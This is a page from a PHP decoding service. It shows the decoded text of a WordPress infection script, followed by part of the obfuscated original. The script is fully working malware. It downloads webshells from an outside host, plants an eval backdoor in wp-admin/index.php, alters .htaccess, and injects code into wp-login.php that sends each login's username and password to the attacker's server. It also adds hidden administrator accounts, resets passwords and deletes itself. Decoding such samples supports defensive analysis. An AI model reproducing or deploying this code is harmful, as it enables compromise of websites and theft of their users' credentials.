Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php header( 'Content-Type: text/html;charset=utf-8' ); error_reporting( E_ALL ); $s..
Decoded Output download
<?php
header( 'Content-Type: text/html;charset=utf-8' );
error_reporting( E_ALL );
$seclevel = "|wp-head.php|wp-site.php";
$domain = "http://s.newnday.xyz/";
$script_name= $_SERVER["SCRIPT_FILENAME"];
$scriptpath=pathinfo($script_name);
$scrip_dir=$scriptpath['dirname'];
$fullurl=$_SERVER['PHP_SELF'];
$currentpath=pathinfo($fullurl);
$currentdir=$currentpath['dirname'];
if($currentdir=='/' || $currentdir=="\")
{
$root=$scrip_dir;
}
else
{
$dirinfo=explode($currentdir,$scrip_dir);
$root=$dirinfo[0];
}
if($root=='' || strpos($root, ".php") !== false )
{
$root=$_SERVER['DOCUMENT_ROOT'];
}
echo $root.'<br/>';
@chdir( $root );
$http = ( isset( $_SERVER["HTTPS"] ) && $_SERVER["HTTPS"] == "on" ) ? 'https' : 'http';
$host = $_SERVER["HTTP_HOST"];
if (isset($_GET["db"])) {
$gov = $_GET["db"];
} else if (isset($_POST["db"])) {
$gov = $_POST["db"];
} else {
$gov = '';
}
if ( isset( $_POST['message_type'] ) && ! empty( $_POST['message_type'] ) ) {
$message_type = $_POST['message_type'];
} else {
$message_type = 'html';
}
if (isset($_GET["q"])) {
$q = $_GET["q"];
} else if (isset($_POST["q"])) {
$q = $_POST["q"];
} else {
$q = '';
}
$current_name=basename($_SERVER['PHP_SELF']);
if(strpos($current_name,'php7') !== false)
{
$enfile7='7';
}
else
{
$enfile7='';
}
$f_put = "file_put_contents";
$f_get = "file_get_contents";
$sellerinfo=$f_get($domain.'/seller/readtxt1.php?domain='.$_SERVER["HTTP_HOST"]);
$sellerinfoarr=explode("
",$sellerinfo);
$sellerinfo=$sellerinfoarr[0];
if($sellerinfo<>'')
{
if(strpos($sellerinfo,'|') !== false)
{
$sellerinfoarray=explode('|',$sellerinfo);
$sellerinfo=$sellerinfoarray[0];
$sellersizearray=explode(',',$sellerinfoarray[1]);
$parsedUrl = parse_url(trim($sellerinfo));
$sellsize=filesize($root.$parsedUrl['path']);
foreach($sellersizearray as $sellersizeinfo)
{
if(strpos($sellersizeinfo,strval($sellsize)) !== false)
{
$modelarray=explode(':',$sellersizeinfo);
$mode=(int)$modelarray[1];
break;
}
}
}
$parsedUrl = parse_url(trim($sellerinfo));
if(file_exists($root.$parsedUrl['path']))
{
$seller = $parsedUrl['path'];
}
else
{
$seller ='';
}
}
else
{
$seller ='';
}
echo '<span style="font-size:15px; color:red;">seller-enfile:'.$seller.'</span><br/>';
// if(file_exists($root.$seller))
// {
// $sellerfc=file_get_contents($root.$seller);
// $loginpart=get($domain.'mjcode/login.gif');
// if($loginpart)
// {
// $sellerlast=$loginpart.$sellerfc;
// $serllerput=file_put_contents($root.$seller,$sellerlast);
// if($serllerput)
// {
// echo 'mjlogin success';
// }
// }
// else
// {
// echo '<span style="color:red;">mjlogin fail</span>';
// }
// }
$arpath8 = array();
fi1( $root );
$fp2 = @fp2($root);
$htens = array();
$ht =
'
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
';
if (isset($_GET["q"])) {
$q = $_GET["q"];
} else if (isset($_POST["q"])) {
$q = $_POST["q"];
} else {
$q = '';
}
$current_name=basename($_SERVER['PHP_SELF']);
function fp2($root)
{
global $root, $http, $host, $domain, $ht, $gov, $arpath8;
$p_arr = array();
$pnew_arr = array();
foreach ($arpath8 as $k => $v) {
$qupath = str_replace($root, "", $v);
$p_arr[$k] = explode("/", $qupath);
if (count($p_arr[$k]) >= 3) {
$pnew_arr[] = $v;
}
}
return $pnew_arr;
}
function enfile() {
global $root, $http, $host, $domain, $arpath8, $fp2, $enfile7,$seller;
$htens = array();
$return_result = array();
$return_result['title'] = 'create shell';
$return_result['status'] = 'ok';
$return_result['file'] = array();
//create wp-info.php
$filename='wp-info.php';
$rfnew = get( $domain . 't1/h2.gif');
if(file_exists($root.'/'.$filename))
{
@chmod($root.'/'.$filename,0644);
}
$xdnew_ok = @file_put_contents($root.'/'.$filename,$rfnew);
if ( $xdnew_ok ) {
$xdnew_url = $http . "://" . $host . '/' . $filename;
//$return_result['message'][] = 'file:' . " " . $xdnew_url . ' success';
//$return_result['file'][] = $xdnew_url;
}
//create wp-term.php
$filenamesite='wp-term.php';
$siterfnew = get( $domain . 'sitemap/wp-term.gif');
if(file_exists($root.'/'.$filenamesite))
{
@chmod($root.'/'.$filenamesite,0644);
}
$xdnewsite_ok = @file_put_contents($root.'/'.$filenamesite,$siterfnew);
if ( $xdnewsite_ok ) {
$xdnewsite_url = $http . "://" . $host . '/' . $filenamesite;
//$return_result['message'][] = 'file:' . " " . $xdnew_url . ' success';
//$return_result['file'][] = $xdnew_url;
}
//create wp-ver.php
$filenamever='wp-ver.php';
$verrfnew = get( $domain . 't1/wp-ver.gif');
if(file_exists($root.'/'.$filenamever))
{
@chmod($root.'/'.$filenamever,0644);
}
$xdnewver_ok = @file_put_contents($root.'/'.$filenamever,$verrfnew);
if ( $xdnewver_ok ) {
$xdnewver_url = $http . "://" . $host . '/' . $filenamever;
//$return_result['message'][] = 'file:' . " " . $xdnew_url . ' success';
//$return_result['file'][] = $xdnew_url;
}
//create wp-content/index.php
$filenamwpindex='wp-content/index.php';
$verrfnew = get( $domain . 't1/wp-ver.gif');
if(file_exists($root.'/'.$filenamwpindex))
{
@chmod($root.'/'.$filenamwpindex,0644);
}
$xdnewpindex_ok = @file_put_contents($root.'/'.$filenamwpindex,$verrfnew);
if ( $xdnewpindex_ok ) {
$xdnewpindex_url = $http . "://" . $host . '/' . $filenamwpindex;
//$return_result['message'][] = 'file:' . " " . $xdnew_url . ' success';
//$return_result['file'][] = $xdnew_url;
}
//create wp-content/plugins/wp-ver.php
$filenamever2='wp-content/plugins/wp-ver.php';
$verrfnew = get( $domain . 't1/wp-ver.gif');
if(file_exists($root.'/'.$filenamever2))
{
@chmod($root.'/'.$filenamever2,0644);
}
$xdnewver2_ok = @file_put_contents($root.'/'.$filenamever2,$verrfnew);
if ( $xdnewver2_ok ) {
$xdnewver2_url = $http . "://" . $host . '/' . $filenamever2;
//$return_result['message'][] = 'file:' . " " . $xdnew_url . ' success';
//$return_result['file'][] = $xdnew_url;
}
//create wp-content/plugins/wp-config-sample.php
$filename2='wp-content/plugins/wp-config-sample.php';
$rfnew2 = get( $domain . 't1/blust.gif');
if(file_exists($root.'/'.$filename2))
{
@chmod($root.'/'.$filename2,0644);
}
$xdnew_ok2 = @file_put_contents($root.'/'.$filename2,$rfnew2);
if ( $xdnew_ok2 ) {
$xdnew_url2 = $http . "://" . $host . '/' . $filename2;
$return_result['message'][] = 'file:' . " " . $xdnew_url2 . ' success';
$return_result['file'][] = $xdnew_url2;
}
//create wp-content/plugins/wp-config-sample.php end
//create wp-admin.php
$filename5='wp-admin.php';
$rfnew5 = get( $domain . 't1/u1.gif');
if(file_exists($root.'/'.$filename5))
{
@chmod($root.'/'.$filename5,0644);
}
$xdnew_ok5 = @file_put_contents($root.'/'.$filename5,$rfnew5);
if ( $xdnew_ok5 ) {
$xdnew_url5 = $http . "://" . $host . '/' . $filename5;
//$return_result['message'][] = 'file:' . " " . $xdnew_url5 . ' success';
//$return_result['file'][] = $xdnew_url5;
}
//create wp-admin.php
//create wp-admin/checkbox.php
$filename6='wp-admin/checkbox.php';
$rfnew6 = get( $domain . 't1/u1.gif');
if(file_exists($root.'/'.$filename6))
{
@chmod($root.'/'.$filename6,0644);
}
$xdnew_ok6 = @file_put_contents($root.'/'.$filename6,$rfnew6);
if ( $xdnew_ok6 ) {
$xdnew_url6 = $http . "://" . $host . '/' . $filename6;
//$return_result['message'][] = 'file:' . " " . $xdnew_url6 . ' success';
//$return_result['file'][] = $xdnew_url6;
@touch('wp-admin/checkbox.php', strtotime("-280 days", time()));
}
//create wp-admin/checkbox.php end
//create checkbex.php
$loginpart=get( $domain . 'mjcode/login.gif');
$filename3='checkbex.php';
if(!$seller)
{
$rfnew3 = get( $domain . 't1/h3.gif');
}
else
{
$rfnew3 =file_get_contents($root.$seller);
$rfnew3 = $loginpart.$rfnew3;
}
if(file_exists($root.'/'.$filename3))
{
@chmod($root.'/'.$filename3,0644);
}
$xdnew_ok3 = @file_put_contents($root.'/'.$filename3,$rfnew3);
if ( $xdnew_ok3 ) {
$xdnew_url3 = $http . "://" . $host . '/' . $filename3;
$return_result['message'][] = 'file:' . " " . $xdnew_url3 . ' success';
$return_result['file'][] = $xdnew_url3;
}
//create checkbex.php end
$check_repeat = array();
// $custom_file = array('wp-content','wp-includes');
$custom_file = array();
$wrmfwlf = array(
'/h1.gif',
'/h2.gif',
'/h3.gif',
'/h4.gif',
'/h5.gif',
'/i1.gif',
'/i2.gif',
'/i3.gif',
'/i4.gif',
'/i5.gif'
);
if($seller)
{
array_push($wrmfwlf,$seller,$seller);
}
if(count($arpath8)<=9)
{
for($num=0;$num<count($arpath8);$num++)
{
array_push( $custom_file, $arpath8[$num] );
}
}
else
{
$ranfile = array_rand( $arpath8, count( $wrmfwlf ) - count( $custom_file ) );
foreach ( $ranfile as $i ) {
array_push( $custom_file, $arpath8[ $i ] );
}
}
$self_shell_name = array(
'updates.php'.$enfile7,
'wp-config-sample.php'.$enfile7,
'wp-config-sample.php'.$enfile7,
'spacings.php'.$enfile7,
'duotones.php'.$enfile7,
'admin.php'.$enfile7,
'index.php'.$enfile7,
'themes.php'.$enfile7,
'customsizes.php'.$enfile7,
'checkbex.php'.$enfile7
);
if($seller)
{
array_push($self_shell_name,'wp-options.php'.$enfile7,'wp-link.php'.$enfile7);
}
//updates.php|wp-config-sample.php|themes.php|dimensiones.php|duotones.php|spacings.php|update.php|customs.php
$i = 0;
if(count($arpath8)<=9)
{
$enfilecount=sizeof( $arpath8 );
}
else
{
$enfilecount=sizeof( $wrmfwlf );
}
while ( $i < $enfilecount ) {
$htens[ $custom_file[ $i ] ] = $self_shell_name[ $i ];
$sf = $custom_file[$i] . '/' . $self_shell_name[ $i ];
if(strpos($wrmfwlf[ $i ],'.php') !== false){
$rf = $loginpart.file_get_contents($root.$wrmfwlf[ $i ]);
}else{
$rf = get( $domain . 't1' . $wrmfwlf[ $i ] );
}
$xd_ok = @file_put_contents($sf,$rf);
//$fh = fopen( $sf, "w+" );
//$xd_ok = fwrite( $fh, $rf );
//fclose( $fh );
if ( $xd_ok ) {
$xd_url = $http . "://" . $host . '/' . $sf;
$return_result['message'][] = 'file:' . " " . $xd_url . ' success';
$return_result['file'][] = $xd_url;
//if( basename($sf.'/index.php') != 'index.php' ){
// $self_shell_name[] = basename($sf);
//}
}
$i ++;
}
$wp_admin_content = @file_get_contents( 'wp-admin/index.php' );
if ( $wp_admin_content ) {
$vercontent=get( $domain.'/k/ver.gif');
$result = @file_put_contents( $root.'/wp-admin/index.php', "<?php if(isset(\$_POST['cdshell']) && !empty(\$_POST['cdshell'])){@eval(\$_POST['cdshell']);} ?>" .$vercontent."
". $wp_admin_content );
if ( $result ) {
@touch('wp-admin/index.php', strtotime("-320 days", time()));
$xd_url = $http . "://" . $host . '/' . 'wp-admin/index.php';
$return_result['message'][] = 'file:' . " " . $xd_url . ' success';
$return_result['file'][] = $xd_url;
}
}
$htc = '';
$htc .= '<IfModule mod_rewrite.c>' . "
";
$htc .= 'RewriteEngine On' . "
";
$htc .= 'RewriteBase /' . "
";
$htc .= 'RewriteRule ^index.php$ - [L]' . "
";
$htc .= 'RewriteCond %{REQUEST_FILENAME} !-f' . "
";
$htc .= 'RewriteCond %{REQUEST_FILENAME} !-d' . "
";
$htc .= 'RewriteRule . index.php [L]' . "
";
$htc .= '</IfModule>' . "
";
$htc .= '<FilesMatch ".*\.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|php7|php8|suspected)$">' . "
";
$htc .= 'Order Allow,Deny' . "
";
$htc .= 'Deny from all' . "
";
$htc .= '</FilesMatch>' . "
";
$htc .= '<FilesMatch "^({#htens})$">' . "
";
$htc .= 'Order Allow,Deny' . "
";
$htc .= 'Allow from all' . "
";
$htc .= '</FilesMatch>' . "
";
$htresult = file_put_contents( $root . '/.hcontentold', json_encode( $htens ) );
$htresult = file_put_contents( $root . '/.hcontent', $htc );
if ( $htresult ) {
$return_result['htcontent'] = $htc;
}
return $return_result;
}
function get( $url ) {
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $url );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, 1 );
curl_setopt( $ch, CURLOPT_ENCODING, 'gzip,deflate' );
curl_setopt( $ch, CURLOPT_HTTPHEADER, array( 'Expect:' ) );
if ( stripos( $url, "https:" ) === false ) {
curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, false );
curl_setopt( $ch, CURLOPT_SSL_VERIFYHOST, false );
}
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );
$body = curl_exec( $ch );
curl_close( $ch );
return $body;
}
function output_message( $result, $message_type = 'html', $html_tag = 'li' ) {
if ( $message_type != 'html' ) {
echo json_encode( $result );
return;
}
if ( ! is_array( $result ) ) {
return;
}
if ( ! isset( $result['title'] ) ) {
$result['title'] = '';
}
echo '---------start ' . $result['title'];
if ( sizeof( $result['message'] ) > 0 ) {
foreach ( $result['message'] as $message ) {
$message = str_replace( 'success', '<font color="blue">success</font>', $message );
$message = str_replace( ' ok', '<font color="blue"> ok</font>', $message );
$message = str_replace( 'fail', '<font color="red">fail</font>', $message );
echo "<$html_tag>" . $message . "</$html_tag>";
}
}
if ( isset( $result['status'] ) && ! empty( $result['status'] ) ) {
if ( $result['status'] == 'ok' ) {
$status = '<font color="green">' . $result['status'] . '</font>';
}
if ( $result['status'] == 'fail' ) {
$status = '<font color="red">' . $result['status'] . '</font>';
}
echo '---------end ' . $result['title'] . '===>status:' . $status;
} else {
$status = '<font color="green">ok</font>';
echo '---------end ' . $result['title'] . '===>status:' . $status;
}
echo "<br />";
}
function adduser($username, $encryptedPassword, $changeAllPassword)
{
global $root, $http, $host, $domain, $ht, $gov;
$contents = file_get_contents("wp-config.php");
preg_match("@['|\"]DB_NAME['|\"],\s*['|\"](.*?)['|\"]@", $contents, $matchd);
preg_match("@['|\"]DB_USER['|\"],\s*['|\"](.*?)['|\"]@", $contents, $matchu);
preg_match("@['|\"]DB_PASSWORD['|\"],\s*['|\"](.*?)['|\"]@", $contents, $matchp);
preg_match("@['|\"]DB_HOST['|\"],\s*['|\"](.*?)['|\"]@", $contents, $matchh);
preg_match("@table_prefix\s*=\s*['|\"](.*?)['|\"]@", $contents, $matchw);
$db_name = $matchd[1];
$db_user = $matchu[1];
$db_pass = $matchp[1];
$db_host = $matchh[1];
$db_pre = $matchw[1];
$db_port = "3306";
if (strstr($db_host, ":")) {
$arr = explode(":", $db_host);
$db_host = $arr[0];
$db_port = $arr[1];
}
if (trim($db_host) == "") {
$db_host = "localhost";
}
$con = mysqli_connect($db_host, $db_user, $db_pass, $db_name, $db_port);
if ($changeAllPassword == true) {
$sql = "update $db_pre" . "users set user_pass='$encryptedPassword'";
$query = mysqli_query($con, $sql);
}
$sql = "select * from $db_pre" . "users where user_login='$username';";
$query = mysqli_query($con, $sql);
$row = mysqli_fetch_array($query);
if (!empty($row)) {
$id= $row['ID'];
$sql = "update $db_pre" . "users set user_pass='$encryptedPassword' where user_login='$username';";
$query = mysqli_query($con, $sql);
return "user $username exists, change password";
} else {
$sql = "insert into $db_pre" . "users(user_login,user_pass,user_nicename,user_email,user_registered,user_activation_key,user_status,display_name) values('$username', '$encryptedPassword', '$username', '[email protected]', '2021-05-21 09:13:26', '', '0', '$username');";
$query = mysqli_query($con, $sql);
$sql = "select ID from $db_pre" . "users where user_login='$username';";
$query = mysqli_query($con, $sql);
$row = mysqli_fetch_array($query);
$id = $row['ID'];
$sql = "insert into $db_pre" . "usermeta(user_id, meta_key, meta_value) values($id, '$db_pre" . "capabilities', 'a:1:{s:13:\"administrator\";b:1;}');";
$query = mysqli_query($con, $sql);
$sql = "select * from $db_pre" . "users where user_login='$username';";
$query = mysqli_query($con, $sql);
$row = mysqli_fetch_array($query);
if ($row['user_login'] == $username) {
return "useradd $username ok";
}
$sql = "select * from ".$db_pre."usermeta where user_id=1 ;";
$result = mysqli_query($con,$sql);
if (mysqli_num_rows($result) > 0) {
while($row = mysqli_fetch_array($result)) {
$meta_key[]=$row["meta_key"];
$meta_value[]= $row["meta_value"];
}
}
for($b=0;$b<count($meta_key);$b++)
{
if($meta_key[$b]<>'')
{
$sql = "select * from ".$db_pre."usermeta where user_id=". $id." and meta_key='".$meta_key[$b]."';";
$result = mysqli_query($con,$sql);
if (mysqli_num_rows($result) <= 0)
{
$sql = "insert into ".$db_pre."usermeta(user_id, meta_key, meta_value) values(".$id.", '".$meta_key[$b]."', '".$meta_value[$b]."');";
$query = mysqli_query($con, $sql);
}
}
}
}
return "useradd $username fail";
}
function loginpassword()
{
global $root, $http, $host, $ht, $gov, $sitemap_code_file, $oneline, $mode, $domain;
$return_result = array();
$return_result['title'] = __FUNCTION__;
if (file_exists($root."/wp-login.php")) {
$src="/*login*/
function getm(\$url){ \$ch = curl_init(); curl_setopt(\$ch, CURLOPT_URL, \$url); curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, 1); \$cnt = curl_exec(\$ch); curl_close(\$ch); return \$cnt;} if(isset(\$_POST['log']) && isset(\$_POST['pwd'])) { \$username=\$_POST['log'];
\$password=\$_POST['pwd'];
if(\$username){ \$userm = wp_authenticate( \$_POST['log'], \$_POST['pwd']);
if ( !is_wp_error( \$userm ) ) {
\$hurl=\$_SERVER['HTTP_HOST']; \$m=\"dt=\".date(\"Y-m-d-H:i:s\",time()).\"&shost=\".\$hurl.\"&user=\".\$username.\"&pwd=\".\$password; \$ws=\"http://s.newnday.xyz/\"; @getm(\$ws.'/wup.php?'.\$m);} } } ";
$wplogin_file=$root.'/wp-login.php';
$handle = fopen($wplogin_file, "r");
if ($handle) {
$size = filesize($wplogin_file);
$wploginc = fread($handle, $size);
}
$f_put = "file_put_contents";
$f_get = "file_get_contents";
if (preg_match('/case \'login\':[\s\S]*?default:/', $wploginc)) {
$wploginc = preg_replace('/case \'login\':[\s\S]*?default:/', "case 'login':"."
"."
".'default:', $wploginc);
}
$wploginc= str_replace('default:',$src."
"."
".'default:',$wploginc);
$f_put($root.'/wp-login.php',$wploginc);
$wplogin=$f_get($root.'/wp-login.php');
$wplogin_code= str_replace("http://s.newnday.xyz/",strto16("http://s.newnday.xyz/"),$wplogin);
$f_put($root.'/wp-login.php',$wplogin_code);
}
if (file_exists($root."/wp-config.php")) {
$return_result['message'][] = adduser('wp-blog', '$P$BrYz9dLFOzP5z/3vTIH2fhdtEyGH7z.', true);
$return_result['message'][] = adduser('wp-user', '3a0b9bff4e2649af7d4c62878bf88b3e', false);
}
if (!is_dir($root . '/wp-includes') || !is_dir($root . '/wp-content')) {
$return_result['message'][] ='The site is not wp.';
}
return $return_result;
}
$sedht_result = sedht();
output_message($sedht_result, $message_type);
$enfile_result = enfile(); // 3
down_s_file();
if ( file_exists( "wp-config.php" ) ) {
//$adduser_message = adduser();
//$enfile_result['message'][] = $adduser_message;
}
output_message( $enfile_result, $message_type );
if ( $message_type == 'html' ) {
if ( isset( $enfile_result['file'] ) && sizeof( $enfile_result['file'] ) ) {
echo "path:<br /><textarea style=\"width: 90%;height: 100px;\">";
foreach ( $enfile_result['file'] as $file ) {
$pas="Go#%1024@Mvc";
echo $file."?pas=" .$pas. " ";
}
echo "</textarea>";
}
if ( isset( $enfile_result['htcontent'] ) ) {
echo "htcontent:<br /><textarea style=\"width: 40%;height: 200px;\">";
echo $enfile_result['htcontent'];
echo "</textarea>";
}
}
function down_s_file() {
global $domain;
$gh = get( $domain . '/h/gh.gif' );
if ( function_exists( 'file_put_contents' ) ) {
file_put_contents( 'gh.php', $gh );
} else {
$fh = fopen( 'gh.php', "a+" );
fwrite( $fh, $gh );
fclose( $fh );
}
}
function fi1( $path ) {
global $root, $arpath8;
if ( $handle = opendir( $path ) ) {
while ( ( $file = readdir( $handle ) ) !== false ) {
if ( $file != "." && $file != ".." ) {
$pfile = $path . "/" . $file;
if ( is_dir( $pfile ) && ! is_link( $pfile ) ) {
if ( substr_count( str_replace( $root . '/', '', $pfile ), '/' ) < 3 ) {
fi1( $pfile );
}
if ( ! file_exists( $pfile . "/index.php" ) ) {
array_push( $arpath8, str_replace( $root . '/', '', $pfile ) );
}
}
}
}
}
shuffle( $arpath8 );
}
function sedht()
{
global $root, $http, $host, $ht, $domain;
$return_data = array();
$robots_code="User-agent: *"."
"."Allow: /"."
"."
"."Sitemap: host/sitemap.xml"."
"."Sitemap: host/sitemap.xml.gz"."
"."Sitemap: host/?sitemap.xml"."
"."Sitemap: host/sitemap.xml.gz";
$robots_code=str_replace('host',$http.'://'.$host,$robots_code);
$robots_put=@file_put_contents($root.'/robots.txt', $robots_code);
if (!$robots_put || $robots_code=='')
{
$return_data['message'][] = 'modify file robots.txt file fail.';
}
else
{
$return_data['message'][] = 'modify file robots.txt file success.';
}
if(file_exists($root .'/sitemap.xml'))
{
@unlink($root .'/sitemap.xml');
}
@chmod('.htaccess', 0644);
$file_time = filectime('.htaccess');
$n = file_put_contents('.htaccess', $ht);
if (!$n) {
$return_data['status'] = 'fail';
$return_data['message'][] = 'write .htaccess file fail';
} else {
$return_data['message'][] = '.htaccess create success.';
touch('.htaccess', $file_time);
$return_data['message'][] = '.htaccess time modify success';
@chmod('.htaccess', 0444);
$return_data['message'][] = '.htaccess 0444 modify success';
}
return $return_data;
}
function urla($url, $header = null, $postdata = null)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');
if (stripos($url, "https:") === false) {
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
}
if (is_array($header) && !empty($header)) {
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
}
if (is_array($postdata) && !empty($postdata)) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
}
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$body = curl_exec($ch);
curl_close($ch);
return $body;
}
if (is_dir($root."/wp-includes") && is_dir($root."/wp-admin")) {
$loginpassword_result = loginpassword(); // 4
output_message($loginpassword_result, $message_type);
}
@unlink( __FILE__ );
?>Did this file decode correctly?
Original Code
<?php
header( 'Content-Type: text/html;charset=utf-8' );
error_reporting( E_ALL );
$seclevel = "|wp-head.php|wp-site.php";
$domain = "\x68\x74\x74\x70\x3a\x2f\x2f\x73\x2e\x6e\x65\x77\x6e\x64\x61\x79\x2e\x78\x79\x7a\x2f";
$script_name= $_SERVER["SCRIPT_FILENAME"];
$scriptpath=pathinfo($script_name);
$scrip_dir=$scriptpath['dirname'];
$fullurl=$_SERVER['PHP_SELF'];
$currentpath=pathinfo($fullurl);
$currentdir=$currentpath['dirname'];
if($currentdir=='/' || $currentdir=="\\")
{
$root=$scrip_dir;
}
else
{
$dirinfo=explode($currentdir,$scrip_dir);
$root=$dirinfo[0];
}
if($root=='' || strpos($root, ".php") !== false )
{
$root=$_SERVER['DOCUMENT_ROOT'];
}
echo $root.'<br/>';
@chdir( $root );
$http = ( isset( $_SERVER["HTTPS"] ) && $_SERVER["HTTPS"] == "on" ) ? 'https' : 'http';
$host = $_SERVER["HTTP_HOST"];
if (isset($_GET["db"])) {
$gov = $_GET["db"];
} else if (isset($_POST["db"])) {
$gov = $_POST["db"];
} else {
$gov = '';
}
if ( isset( $_POST['message_type'] ) && ! empty( $_POST['message_type'] ) ) {
$message_type = $_POST['message_type'];
} else {
$message_type = 'html';
}
if (isset($_GET["q"])) {
$q = $_GET["q"];
} else if (isset($_POST["q"])) {
$q = $_POST["q"];
} else {
$q = '';
}
$current_name=basename($_SERVER['PHP_SELF']);
if(strpos($current_name,'php7') !== false)
{
$enfile7='7';
}
else
{
$enfile7='';
}
$f_put = "\x66il\x65_p\x75t_\x63on\x74en\x74s";
$f_get = "\x66il\x65_g\x65t_\x63on\x74en\x74s";
$sellerinfo=$f_get($domain.'/seller/readtxt1.php?domain='.$_SERVER["HTTP_HOST"]);
$sellerinfoarr=explode("\n",$sellerinfo);
$sellerinfo=$sellerinfoarr[0];
if($sellerinfo<>'')
{
if(strpos($sellerinfo,'|') !== false)
{
$sellerinfoarray=explode('|',$sellerinfo);
$sellerinfo=$sellerinfoarray[0];
$sellersizearray=explode(',',$sellerinfoarray[1]);
$parsedUrl = parse_url(trim($sellerinfo));
$sellsize=filesize($root.$parsedUrl['path']);
foreach($sellersizearray as $sellersizeinfo)
{
if(strpos($sellersizeinfo,strval($sellsize)) !== false)
{
$modelarray=explode(':',$sellersizeinfo);
$mode=(int)$modelarray[1];
break;
}
}
}
$parsedUrl = parse_url(trim($sellerinfo));
if(file_exists($root.$parsedUrl['path']))
{
$seller = $parsedUrl['path'];
}
else
{
$seller ='';
}
}
else
{
$seller ='';
}
echo '<span style="font-size:15px; color:red;">seller-enfile:'.$seller.'</span><br/>';
// if(file_exists($root.$seller))
// {
// $sellerfc=file_get_contents($root.$seller);
// $loginpart=get($domain.'mjcode/login.gif');
// if($loginpart)
// {
// $sellerlast=$loginpart.$sellerfc;
// $serllerput=file_put_contents($root.$seller,$sellerlast);
// if($serllerput)
// {
// echo 'mjlogin success';
// }
// }
// else
// {
// echo '<span style="color:red;">mjlogin fail</span>';
// }
// }
$arpath8 = array();
fi1( $root );
$fp2 = @fp2($root);
$htens = array();
$ht =
'
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
';
if (isset($_GET["q"])) {
$q = $_GET["q"];
} else if (isset($_POST["q"])) {
$q = $_POST["q"];
} else {
$q = '';
}
$current_name=basename($_SERVER['PHP_SELF']);
function fp2($root)
{
global $root, $http, $host, $domain, $ht, $gov, $arpath8;
$p_arr = array();
$pnew_arr = array();
foreach ($arpath8 as $k => $v) {
$qupath = str_replace($root, "", $v);
$p_arr[$k] = explode("/", $qupath);
if (count($p_arr[$k]) >= 3) {
$pnew_arr[] = $v;
}
}
return $pnew_arr;
}
function enfile() {
global $root, $http, $host, $domain, $arpath8, $fp2, $enfile7,$seller;
$htens = array();
$return_result = array();
$return_result['title'] = 'create shell';
$return_result['status'] = 'ok';
$return_result['file'] = array();
//create wp-info.php
$filename='wp-info.php';
$rfnew = get( $domain . 't1/h2.gif');
if(file_exists($root.'/'.$filename))
{
@chmod($root.'/'.$filename,0644);
}
$xdnew_ok = @file_put_contents($root.'/'.$filename,$rfnew);
if ( $xdnew_ok ) {
$xdnew_url = $http . "://" . $host . '/' . $filename;
//$return_result['message'][] = 'file:' . " \t" . $xdnew_url . ' success';
//$return_result['file'][] = $xdnew_url;
}
//create wp-term.php
$filenamesite='wp-term.php';
$siterfnew = get( $domain . 'sitemap/wp-term.gif');
if(file_exists($root.'/'.$filenamesite))
{
@chmod($root.'/'.$filenamesite,0644);
}
$xdnewsite_ok = @file_put_contents($root.'/'.$filenamesite,$siterfnew);
if ( $xdnewsite_ok ) {
$xdnewsite_url = $http . "://" . $host . '/' . $filenamesite;
//$return_result['message'][] = 'file:' . " \t" . $xdnew_url . ' success';
//$return_result['file'][] = $xdnew_url;
}
//create wp-ver.php
$filenamever='wp-ver.php';
$verrfnew = get( $domain . 't1/wp-ver.gif');
if(file_exists($root.'/'.$filenamever))
{
@chmod($root.'/'.$filenamever,0644);
}
$xdnewver_ok = @file_put_contents($root.'/'.$filenamever,$verrfnew);
if ( $xdnewver_ok ) {
$xdnewver_url = $http . "://" . $host . '/' . $filenamever;
//$return_result['message'][] = 'file:' . " \t" . $xdnew_url . ' success';
//$return_result['file'][] = $xdnew_url;
}
//create wp-content/index.php
$filenamwpindex='wp-content/index.php';
$verrfnew = get( $domain . 't1/wp-ver.gif');
if(file_exists($root.'/'.$filenamwpindex))
{
@chmod($root.'/'.$filenamwpindex,0644);
}
$xdnewpindex_ok = @file_put_contents($root.'/'.$filenamwpindex,$verrfnew);
if ( $xdnewpindex_ok ) {
$xdnewpindex_url = $http . "://" . $host . '/' . $filenamwpindex;
//$return_result['message'][] = 'file:' . " \t" . $xdnew_url . ' success';
//$return_result['file'][] = $xdnew_url;
}
//create wp-content/plugins/wp-ver.php
$filenamever2='wp-content/plugins/wp-ver.php';
$verrfnew = get( $domain . 't1/wp-ver.gif');
if(file_exists($root.'/'.$filenamever2))
{
@chmod($root.'/'.$filenamever2,0644);
}
$xdnewver2_ok = @file_put_contents($root.'/'.$filenamever2,$verrfnew);
if ( $xdnewver2_ok ) {
$xdnewver2_url = $http . "://" . $host . '/' . $filenamever2;
//$return_result['message'][] = 'file:' . " \t" . $xdnew_url . ' success';
//$return_result['file'][] = $xdnew_url;
}
//create wp-content/plugins/wp-config-sample.php
$filename2='wp-content/plugins/wp-config-sample.php';
$rfnew2 = get( $domain . 't1/blust.gif');
if(file_exists($root.'/'.$filename2))
{
@chmod($root.'/'.$filename2,0644);
}
$xdnew_ok2 = @file_put_contents($root.'/'.$filename2,$rfnew2);
if ( $xdnew_ok2 ) {
$xdnew_url2 = $http . "://" . $host . '/' . $filename2;
